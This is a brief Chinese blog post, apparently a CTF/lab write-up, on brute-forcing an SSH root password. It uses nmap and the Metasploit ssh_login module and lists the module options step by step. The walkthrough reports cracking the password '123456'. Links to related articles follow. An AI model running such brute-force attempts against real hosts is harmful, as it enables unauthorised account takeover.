ssh爆破获取用户密码

Posted 你的笑丶魅惑了我的瞳ω

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ssh爆破获取用户密码相关的知识,希望对你有一定的参考价值。

通过nmap扫描目标主机发现ssh版本为OpenSSH 5.3,有漏洞

漏洞影响版本(OpenSSH =< 8.3p1)

使用msfconsole 工具

 

 search ssh        #查找有关ssh的漏洞

找到并使用漏洞use auxiliary/scanner/ssh/ssh_login

show options        #查看此漏洞需要的配置信息

set RHOSTS         #配置目标主机ip

set USERNAME        #设置用户名(题目已知用户名为root)

set PASS_FILE         #配置爆破密码所需字典(一般题目自带字典)

set THREADS           #配置线程

 run 或  exploit         #执行漏洞

 爆破成功,获取密码:123456

 

 

 

 

 

以上是关于ssh爆破获取用户密码的主要内容,如果未能解决你的问题,请参考以下文章

DenyHosts教程:防暴力破解SSH密码

DenyHosts教程:防暴力破解SSH密码

Kali系列之hydra ssh密码爆破

暴力破解与验证码绕过

使用OPENROWSET爆破SQL Server密码

简单的CTF web密码爆破